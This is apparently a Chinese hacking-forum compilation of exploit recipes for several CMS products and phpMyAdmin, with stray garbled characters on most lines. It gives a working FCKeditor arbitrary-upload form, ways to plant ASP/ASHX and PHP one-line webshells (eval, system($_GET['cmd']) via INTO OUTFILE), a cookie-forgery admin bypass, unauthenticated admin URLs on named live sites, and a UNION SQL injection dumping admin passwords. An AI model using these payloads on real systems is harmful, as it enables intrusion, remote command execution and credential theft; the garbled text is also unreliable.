% S2 V$ }" o% q8 F跳转到网站根目录上传任意文件。9 q9 `: F* N7 r3 ~# b D" e
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
. v& }$ y% q+ U S) h7 t7 W<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">8 K; m E$ _7 E" B" h
Upload a new file:<br>
3 `6 g1 D3 @6 V; f- O9 b! E, {<input type="file" name="NewFile" size="50"><br>
: R* ?0 ]3 Y) \1 M2 j2 F<input id="btnUpload" type="submit" value="Upload">1 I) T6 p1 U3 i1 D: Z3 L
</form>
0 z' T$ w$ d, f# \-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 L% [, J9 X" m+ K# q. E5 ?
; M+ r9 w' U4 w2 dSDcms 后台拿webshell% P$ b# y0 S2 J$ G; n X0 D+ y
1 z8 h, d% M% s# x4 u) G3 Q' L
第一种方法:7 e2 Q5 J6 Y; H* Q4 ?# N+ G! `2 k8 P
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
. E& m4 P4 f3 D! n5 n$ a把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
5 g) q2 k v) u用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
' i. q# A- @9 I+ S第二种方法:' E: ]4 U! ?# o! k. y
进入后台-->系统管理-->系统设置-->系统设置->上传设置;: p/ ~2 A% J5 n$ S
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
4 [+ D/ W( X6 H第三种方法:
1 a" }4 f* U- ]; a. ^( g, t6 m% R进入后台-->界面管理-->模板文件管理-->创建文件( H9 Y8 N% U3 g; `' {+ v
文件名写入getshell.ashx9 z6 r6 I' j# D f( l
内容写入下面内容:
$ t' M! S8 _% S/====================复制下面的=========================/- b; s$ V1 K( T5 k2 v A
<%@ WebHandler Language="C#" Class="Handler" %>
7 s# ~! e$ G/ K/ M: susing System;2 s: B4 Z7 M$ z: n1 g* T
using System.Web;
4 D" | Z# V0 ]: N& \using System.IO;1 Z0 @5 k8 {2 V
public class Handler : IHttpHandler {% d, G8 |+ j4 [* q
public void ProcessRequest (HttpContext context) {
- ]$ t5 U& ?" o3 Kcontext.Response.ContentType = "text/plain";
6 M+ ]& i, A4 B; s7 T- V6 fStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
5 l/ t, N( V/ i3 sfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
& X& i$ G, q- z3 F3 zfile1.Flush();; b% ^2 f0 z4 g7 F7 U9 a0 g
file1.Close();
. m8 h+ D& H1 I' O$ l1 r- i}- ]5 \+ ] h" M i, Q3 i1 L
public bool IsReusable {
' j G5 Z3 F( Q1 {get {# b5 Q- D+ R( k6 Y/ E S7 |4 G9 t- {
return false;
+ e" f' W- n4 w3 p" [}
! \" x( {& Q @2 w' o}, H" N. Z9 I1 C2 \7 u7 a% z
}
3 \ W. c& B* @* T5 D/=============================================/1 i: U: Y- ]7 R7 |% w- J5 \+ Q; f; P
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx% o3 R1 O* ?3 k9 o, N+ ]9 k' c; p
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
6 {& A' o7 B1 i2 i& l-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 J. l1 G0 s: x' E
: j, D% h2 A- A# W/ J7 [ESCMS网站管理系统0day
+ r* ]% \# y9 H* v/ s, O/ t* z3 q- W4 C) U
后台登陆验证是通过admin/check.asp实现的8 o/ }/ t! b3 Q% D) `! ^
, ?' K+ D8 F7 D- [$ N! G8 B首先我们打开http://target.com/admin/es_index.html
. W$ x7 Y5 G, G: y& [/ s7 o: J然后在COOKIE结尾加上5 |) Q. _( l1 ~
; ESCMS$_SP2=ES_admin=st0p;1 i8 [! p# A5 }4 ~- E* F' g/ C, G& v
修改,然后刷新
k$ b: L# I4 N C8 f9 B( f8 J h进后台了嘎..$ T" ^2 P; W* ]9 B
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL/ p: ]) z4 B" q* i% [2 Q5 _
Y- M \+ {1 G利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
, n8 q D4 _! z& q0 N( ?# K嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp: O1 ?7 M0 b8 X5 t% C
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
! z; h: `. r3 L( [3 E% r: V在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
( N, d& q# e$ e' D* {! @( C! v------------------------------------------------------------------------------------------------------------------------------------------------------------------------------) {$ p% C' p' I9 \
4 J: ?% ]& A" l% h) x$ u* v
宁志网站管理系统后台无验证漏洞及修复8 k' q; [4 b: C E W9 }, b& |* x
C: n$ P4 e# Z3 m$ b6 N5 c( W1 @网上搜了一下,好像没有发布.如有雷同纯粹巧合!
% M$ ]1 V( R( H! M" E! ~% U官方网站:www.ningzhi.net
) F; x1 y3 b# g: S( S学校网站管理系统 V.2011版本 5 @' {) |+ Z9 Z2 q c& g: K1 x
http://down.chinaz.com/soft/29943.htm 7 h7 ^/ } W/ s) b* _ K: `# \" @
其它版本(如:政府版等),自行下载.2 S1 S& X# h$ g
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~/ R- h" N! D8 i& Y- q+ X
login.asp代码如下:
: [1 W( ~) N) J) \<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> * T* p5 U+ ^" F. P5 V
manage.asp代码我就不帖出来了.反正也没验证., t0 c. D( U. S) o/ I) R
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
% G a1 O+ G7 Q- @% u$ T% o) m漏洞利用:5 Y* t: c p/ B: K0 z l$ a
直接访问http://www.0855.tv/admin/manage.asp
) U# ^2 R5 H% `数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
( @. D; b, K+ Y+ Y---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- W9 u2 o g3 J# k/ L
( Q/ R1 M$ I1 R9 N! D5 _
phpmyadmin拿shell的四种方法总结及修复
% [9 a: Q4 g6 Q, B# A0 j c: e. x- U7 J4 \- m2 ?0 z
方法一:; [8 a8 `) G- z. l$ l) u6 b
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
9 B/ C( h' |/ h z* R2 rINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
: J4 f+ m2 \, @2 a) ~- rSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';( g6 X% c* V0 _8 e. F
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
C8 V8 f8 \! P3 k+ z% `( C. X' l 一句话连接密码:7on
: }( r: @6 J' L9 C5 A) I1 t方法二:
( O3 Z; v2 J& A. C0 t读取文件内容: select load_file('E:/xamp/www/s.php');
3 F% V' n$ u5 Y# |# S, V; ]写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'3 `3 t( K' ]0 J8 b
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
9 ^% d' I" y9 V' t7 B方法三:- ]. P9 A D" {
JhackJ版本 PHPmyadmin拿shell" N' _9 r; Z; e
Create TABLE study (cmd text NOT NULL);
* ^8 _5 }- ~3 P' o$ MInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
3 G1 Q# G& `9 e4 ~& C* n1 B9 Hselect cmd from study into outfile 'E:/wamp/www/7.php';3 B: k$ t. M3 Z# l- ?3 }
Drop TABLE IF EXISTS study;
2 X, K( b H. W5 U6 M+ M<?php eval($_POST[cmd])?>8 m3 F4 y2 `0 I" H' T8 k* [/ A: _. b
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
4 a- ~! ~7 ?5 F/ QINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
* ^ L6 i% F- BSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1 \3 B7 f% `7 w8 M) ~
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
9 @/ s& C" S7 r6 Z% ^方法四:
9 A. p% N' R: y7 J. F8 jselect load_file('E:/xamp/www/study.php');: k) o [2 P0 A$ o% w8 I
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
& S- p) I/ Y6 i Q7 k然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
( j0 f4 _! d( ]* D-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
) c( X3 F' ^ t% O( V' d: t$ @' f( K$ J9 V
NO.001中学网站管理系统 Build 110628 注入漏洞; a. t; ]8 |8 Q
/ M7 g9 R& }* W2 ~+ vNO.001中学网站管理系统功能模块:
2 _: {: R2 v% T" [: U& X1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
( i' V3 E0 _- C- l1 z$ Y7 [4 T2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
2 b7 M. q" l$ v" P' ]0 J% b- m5 b2 {& D3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息2 H8 a6 f' K3 }
4.视频图片管理:一级分类,动态添加视频或者图片等信息9 n7 o8 ?* ]$ _0 {( @
5.留言管理:对留言,修改,删除、回复等管理# P) r4 n7 I' l; L! Z
6.校友频道:包括校友资料excel导出、管理等功能; X3 @$ \/ T3 ~5 m
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
( j2 R$ G/ P( ~% F! E默认后台:admin/login.asp* o& ?. l& N5 \7 g5 P& t2 U
官方演示:http://demo.001cms.net
) }' [3 E4 M' y3 d源码下载地址:http://down.chinaz.com/soft/30187.htm6 D+ [1 m8 Y' `1 h+ b3 H
EXP:# S, J9 h: ~% {" J. w9 [5 k
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
: C1 q6 |0 ~: y. R2 e0 x, k5 G3 s7 R8 S测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin7 P8 l4 A3 D# t% D: V/ ?1 `
getshell:后台有备份,你懂的
- K0 l( N, y7 a& e. t另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
$ ]6 A0 f+ z5 l2 q b) `- _------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |